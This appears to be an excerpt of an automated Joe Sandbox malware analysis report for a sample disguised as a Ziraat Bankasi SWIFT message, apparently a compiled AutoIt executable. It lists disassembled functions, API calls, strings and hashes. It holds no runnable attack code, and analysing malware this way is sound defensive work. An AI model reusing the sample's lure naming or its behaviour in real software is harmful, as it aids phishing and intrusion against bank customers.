Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1148790751-4113822522
Opcode ID: 09edfa7e8b22b30789e644293e850bbc5fa3519c4e6018a8fdb13e9e31096eed
Instruction ID: c8ff18a49484a9fdfb8cc6512a863b82df66310ce149aff80f287f3db53e9ae9
Opcode Fuzzy Hash: 09edfa7e8b22b30789e644293e850bbc5fa3519c4e6018a8fdb13e9e31096eed
Instruction Fuzzy Hash: 56512971104245AFC700EF21C9819AEB7E4FF99758F14485DF896A7292DB31EE0ACB92

Function 000E26BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00113973,00000016,0000138C,00000016,?,00000016,0013DDB4,00000000,?), ref: 000E26F1
LoadStringW.USER32(00000000,?,00113973,00000016), ref: 000E26FA
GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00113973,00000016,0000138C,00000016,?,00000016,0013DDB4,00000000,?,00000016), ref: 000E271C
LoadStringW.USER32(00000000,?,00113973,00000016), ref: 000E271F
__swprintf.LIBCMT ref: 000E276F
__swprintf.LIBCMT ref: 000E2780
_wprintf.LIBCMT ref: 000E2829
MessageBoxW.USER32(00000000,?,?,00011010), ref: 000E2840

Strings

%s (%d) : ==> %s: %s %s, xrefs: 000E2824
Line %d (File "%s"):, xrefs: 000E2769
^ ERROR, xrefs: 000E27D5
Error: , xrefs: 000E27F7
Line %d:, xrefs: 000E277A

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 618562835-2268648507
Opcode ID: 683d87d298e84520468ac2acb94538d9c6a3fd341cc3a2912b8949d3ed274bb8
Instruction ID: 08931b37a79fdf3dea65f7a92892ee5f7026d58ddd8fc2040758487cb36f65c0
Opcode Fuzzy Hash: 683d87d298e84520468ac2acb94538d9c6a3fd341cc3a2912b8949d3ed274bb8
Instruction Fuzzy Hash: 74412A72800259BADB14FBE0DE86EEEB77CAF1A341F100065B50276093EB716F59CB61

Function 000ED0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 000ED0D8
__swprintf.LIBCMT ref: 000ED0FA
CreateDirectoryW.KERNEL32(?,00000000), ref: 000ED137
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 000ED15C
_memset.LIBCMT ref: 000ED17B
_wcsncpy.LIBCMT ref: 000ED1B7
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 000ED1EC
CloseHandle.KERNEL32(00000000), ref: 000ED1F7
RemoveDirectoryW.KERNEL32(?), ref: 000ED200
CloseHandle.KERNEL32(00000000), ref: 000ED20A

Strings

\??\%s, xrefs: 000ED0F4
:, xrefs: 000ED11B
\, xrefs: 000ED110

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: a3f61556312556d4be3c02d1f3294f980c581b9a9512bf9ef7771811d5f2610e
Instruction ID: e1c585f1d44c3ed6edc43794d947990029c6ac386bc1d40521ce5e6a98597287
Opcode Fuzzy Hash: a3f61556312556d4be3c02d1f3294f980c581b9a9512bf9ef7771811d5f2610e
Instruction Fuzzy Hash: 3F3180B2500149ABDB21DFA1DC49FEF37BDEF89741F1040AAF509E2161E77096958B24

Function 000F05F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 000F076F
_wcscat.LIBCMT ref: 000F0787
_wcscat.LIBCMT ref: 000F0799
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000F07AE
SetCurrentDirectoryW.KERNEL32(?), ref: 000F07C2
GetFileAttributesW.KERNEL32(?), ref: 000F07DA
SetFileAttributesW.KERNEL32(?,00000000), ref: 000F07F4
SetCurrentDirectoryW.KERNEL32(?), ref: 000F0806

Strings

*.*, xrefs: 000F0845

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 7240f36bea7693e96aeda1b00989d84771bf521e4f4db05ef0162550a9a92822
Instruction ID: 9873f7a340e463b3d6117528d0fe7ffbfdf309510311b93b4c6182dce2c795bb
Opcode Fuzzy Hash: 7240f36bea7693e96aeda1b00989d84771bf521e4f4db05ef0162550a9a92822
Instruction Fuzzy Hash: 2D81B2715043099FCB64DF64C8449BEB7E8BBC8344F18882EFA85C7652EB30D955DB92

Function 0010EEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000BB34E: GetWindowLongW.USER32(?,000000EB), ref: 000BB35F

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0010EF3B
GetFocus.USER32 ref: 0010EF4B
GetDlgCtrlID.USER32(00000000), ref: 0010EF56
_memset.LIBCMT ref: 0010F081
GetMenuItemInfoW.USER32 ref: 0010F0AC
GetMenuItemCount.USER32(00000000), ref: 0010F0CC
GetMenuItemID.USER32(?,00000000), ref: 0010F0DF
GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0010F113
GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0010F15B
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0010F193
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0010F1C8

Strings

0, xrefs: 0010F079

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 19a5c78934b16b828d1848a8fad129042740d704df6d00d2d51cc82d2bec4495
Instruction ID: 198c33c9c6c3300c1cfb627650c9e4880e634360cd639b1e8a8be5adb1882969
Opcode Fuzzy Hash: 19a5c78934b16b828d1848a8fad129042740d704df6d00d2d51cc82d2bec4495
Instruction Fuzzy Hash: 4C818B70208302AFD720CF15DC85AABBBE9FF88314F14492EF99597691D7B0D946CB92

Function 000DA867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000DABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 000DABD7
Part of subcall function 000DABBB: GetLastError.KERNEL32(?,000DA69F,?,?,?), ref: 000DABE1
Part of subcall function 000DABBB: GetProcessHeap.KERNEL32(00000008,?,?,000DA69F,?,?,?), ref: 000DABF0
Part of subcall function 000DABBB: HeapAlloc.KERNEL32(00000000,?,000DA69F,?,?,?), ref: 000DABF7
Part of subcall function 000DABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 000DAC0E

Part of subcall function 000DAC56: GetProcessHeap.KERNEL32(00000008,000DA6B5,00000000,00000000,?,000DA6B5,?), ref: 000DAC62
Part of subcall function 000DAC56: HeapAlloc.KERNEL32(00000000,?,000DA6B5,?), ref: 000DAC69
Part of subcall function 000DAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,000DA6B5,?), ref: 000DAC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 000DA8CB
_memset.LIBCMT ref: 000DA8E0
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 000DA8FF
GetLengthSid.ADVAPI32(?), ref: 000DA910
GetAce.ADVAPI32(?,00000000,?), ref: 000DA94D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 000DA969
GetLengthSid.ADVAPI32(?), ref: 000DA986
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 000DA995
HeapAlloc.KERNEL32(00000000), ref: 000DA99C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 000DA9BD
CopySid.ADVAPI32(00000000), ref: 000DA9C4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 000DA9F5
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 000DAA1B
SetUserObjectSecurity.USER32(?,00000004,?), ref: 000DAA2F

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 7a7d0bf80988ea9f9839ab655ace2576a33f009257d0168194fb5ddd91ff30af
Instruction ID: a7f1220650393ead8465b308694f4b948a8c861bcbf313e00bdb2ee09d130379
Opcode Fuzzy Hash: 7a7d0bf80988ea9f9839ab655ace2576a33f009257d0168194fb5ddd91ff30af
Instruction Fuzzy Hash: C5514A71A00209AFDF10DFA4ED85EEEBBB9FF05310F04811AF911A7291DB349A56CB65

Function 000ECC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 000ECCA3
LoadStringW.USER32(?,?,00000FFF,?), ref: 000ECCC5
__swprintf.LIBCMT ref: 000ECD1E
__swprintf.LIBCMT ref: 000ECD37
_wprintf.LIBCMT ref: 000ECDED
_wprintf.LIBCMT ref: 000ECE0B

Strings

"%s" (%d) : ==> %s:, xrefs: 000ECE06
"%s" (%d) : ==> %s:%s%s, xrefs: 000ECDE8
Line %d (File "%s"):, xrefs: 000ECD18, 000ECD31
^ ERROR, xrefs: 000ECD8F
Error: , xrefs: 000ECDB5

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-2391861430
Opcode ID: 7cf752cca2948f4bc3ff8b2016a9d1f8573c8332ab81add61ca558840b4f367f
Instruction ID: b1c1aaecfc1571114d49c490a7d7256afeed2f95f16a96f3afdc81a70fc34d35
Opcode Fuzzy Hash: 7cf752cca2948f4bc3ff8b2016a9d1f8573c8332ab81add61ca558840b4f367f
Instruction Fuzzy Hash: A3518C72800149BADF15EBE0CD42EEEB778AF09340F100166F515761A3EB726F9ADB61

Function 000ECA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 000ECA8F
LoadStringW.USER32(00000072,?,00000FFF,?), ref: 000ECAB0
__swprintf.LIBCMT ref: 000ECB09
__swprintf.LIBCMT ref: 000ECB22
_wprintf.LIBCMT ref: 000ECBCD
_wprintf.LIBCMT ref: 000ECBEB

Strings

"%s" (%d) : ==> %s:, xrefs: 000ECBE6
^ ERROR , xrefs: 000ECB64
"%s" (%d) : ==> %s:%s%s, xrefs: 000ECBC8
Line %d (File "%s"):, xrefs: 000ECB03, 000ECB1C
Error: , xrefs: 000ECB95

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-3420473620
Opcode ID: 412e0070b8a637401d5b652c5ef5df5e2657a2c1744b4b812dec4b763fe71115
Instruction ID: df295943bacbf12852997f7868f716ef4a775bf4fea623de632ef58595f47635
Opcode Fuzzy Hash: 412e0070b8a637401d5b652c5ef5df5e2657a2c1744b4b812dec4b763fe71115
Instruction Fuzzy Hash: 9C518D72900249BADF15EBE0DD42EEEB778AF05340F100165F506720A3EB726F9ADB61

Function 000E778F Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 000E7794

Part of subcall function 000BDC38: timeGetTime.WINMM(?,753DB400,001158AB), ref: 000BDC3C

Sleep.KERNEL32(0000000A), ref: 000E77C0
EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 000E77E4
FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 000E7806
SetActiveWindow.USER32 ref: 000E7825
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 000E7833
SendMessageW.USER32(00000010,00000000,00000000), ref: 000E7852
Sleep.KERNEL32(000000FA), ref: 000E785D
IsWindow.USER32 ref: 000E7869
EndDialog.USER32(00000000), ref: 000E787A

Strings

BUTTON, xrefs: 000E77F8
@U=u, xrefs: 000E7833, 000E7852

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: @U=u$BUTTON
API String ID: 1194449130-2582809321
Opcode ID: 59dc90586a26743991e77d5a9f2935c2207ee505d932cf8f752a795958f50d5b
Instruction ID: 9681f808787cf03497b9b43b31225d79bf759e96b69d8df6dfde7c764fbb3477
Opcode Fuzzy Hash: 59dc90586a26743991e77d5a9f2935c2207ee505d932cf8f752a795958f50d5b
Instruction Fuzzy Hash: 8D216F71248245BFE7255F21FC89A267F69FB04349B500028F529A2A62DFB14DA2CB21

Function 000E55BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000E55D7
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 000E5664
GetMenuItemCount.USER32(00161708), ref: 000E56ED
DeleteMenu.USER32(00161708,00000005,00000000,000000F5,?,?), ref: 000E577D
DeleteMenu.USER32(00161708,00000004,00000000), ref: 000E5785
DeleteMenu.USER32(00161708,00000006,00000000), ref: 000E578D
DeleteMenu.USER32(00161708,00000003,00000000), ref: 000E5795
GetMenuItemCount.USER32(00161708), ref: 000E579D
SetMenuItemInfoW.USER32(00161708,00000004,00000000,00000030), ref: 000E57D3
GetCursorPos.USER32(?), ref: 000E57DD
SetForegroundWindow.USER32(00000000), ref: 000E57E6
TrackPopupMenuEx.USER32(00161708,00000000,?,00000000,00000000,00000000), ref: 000E57F9
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 000E5805

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: abb72583d221e2c82fc42f1ea41069cf3e942a7171b4de7c6c206fc9e45b72e7
Instruction ID: 9d9b22b5c70e4eb0c3d0547cdfbe2d6e198accebad46dae7dd680311f9e28f2d
Opcode Fuzzy Hash: abb72583d221e2c82fc42f1ea41069cf3e942a7171b4de7c6c206fc9e45b72e7
Instruction Fuzzy Hash: 30711470641A85BEEB209B16DC89FAABFA5FF4036DF244615F514BB1D1C7B05C60CB90

Function 000DA14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000DA1DC
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 000DA211
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 000DA22D
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 000DA249
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 000DA273
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 000DA29B
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 000DA2A6
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 000DA2AB

Strings

SOFTWARE\Classes\, xrefs: 000DA17D
\CLSID, xrefs: 000DA193
\IPC$, xrefs: 000DA1F3

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1687751970-22481851
Opcode ID: 087ef38abd72d3f6a16d47e3f704a61965d738be4348b60025c04b8ec94af4da
Instruction ID: 967ee4d669ff485e54e76b42e96152aac15ee947fcee299ad3403101f958363f
Opcode Fuzzy Hash: 087ef38abd72d3f6a16d47e3f704a61965d738be4348b60025c04b8ec94af4da
Instruction Fuzzy Hash: 0841E976D10229ABDF25EBE4DC85DEDB7B8BF05710F04402AF801A7262EB719E55CB60

Function 00103C06 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00102BB5,?,?), ref: 00103C1D

Strings

HKEY_CURRENT_USER, xrefs: 00103CE2
HKLM, xrefs: 00103C81
HKCC, xrefs: 00103CD1
HKEY_USERS, xrefs: 00103D04
HKU, xrefs: 00103D15
HKEY_LOCAL_MACHINE, xrefs: 00103C6C
HKCU, xrefs: 00103CF3
HKCR, xrefs: 00103CAB
HKEY_CURRENT_CONFIG, xrefs: 00103CC0
HKEY_CLASSES_ROOT, xrefs: 00103C96

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 51d3213754e541da661d1bc56a0ef3a7908e4389bb702844d761b331716cf6a0
Instruction ID: 9e6c703efdf9e1fc1e843936d49983a6fd76f00060a76a6e2d18482bb3a9c4a7
Opcode Fuzzy Hash: 51d3213754e541da661d1bc56a0ef3a7908e4389bb702844d761b331716cf6a0
Instruction Fuzzy Hash: E041507011028A8BDF04EF50D951AEB3769AF22344F904854FDB56B2D2EBB0EE5BDB50

Function 0010A1B6 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0010A259
CreateCompatibleDC.GDI32(00000000), ref: 0010A260
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0010A273
SelectObject.GDI32(00000000,00000000), ref: 0010A27B
GetPixel.GDI32(00000000,00000000,00000000), ref: 0010A286
DeleteDC.GDI32(00000000), ref: 0010A28F
GetWindowLongW.USER32(?,000000EC), ref: 0010A299
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0010A2AD
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0010A2B9

Strings

@U=u, xrefs: 0010A273
static, xrefs: 0010A1F1

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: @U=u$static
API String ID: 2559357485-3553413495
Opcode ID: 9a85a5b8873e4817dbcee2fc3bb9c9eecd5f48a9e16ed19218c51e1cba419762
Instruction ID: dd5e4689c0e2fee0993d9f460bd3c00914b39fdc435f3631c19bfbe9291ab2b9
Opcode Fuzzy Hash: 9a85a5b8873e4817dbcee2fc3bb9c9eecd5f48a9e16ed19218c51e1cba419762
Instruction Fuzzy Hash: 89317C31100215BFDF219FA4EC49FEA3B69FF19360F110224FA59A61E0C776D862DBA5

Function 000E25B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,001136F4,00000010,?,Bad directive syntax error,0013DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 000E25D6
LoadStringW.USER32(00000000,?,001136F4,00000010), ref: 000E25DD
_wprintf.LIBCMT ref: 000E2610
__swprintf.LIBCMT ref: 000E2632
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 000E26A1

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 000E260B
Error: , xrefs: 000E266F
., xrefs: 000E2687
Line %d (File "%s"):, xrefs: 000E2647
Line %d:, xrefs: 000E262C

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

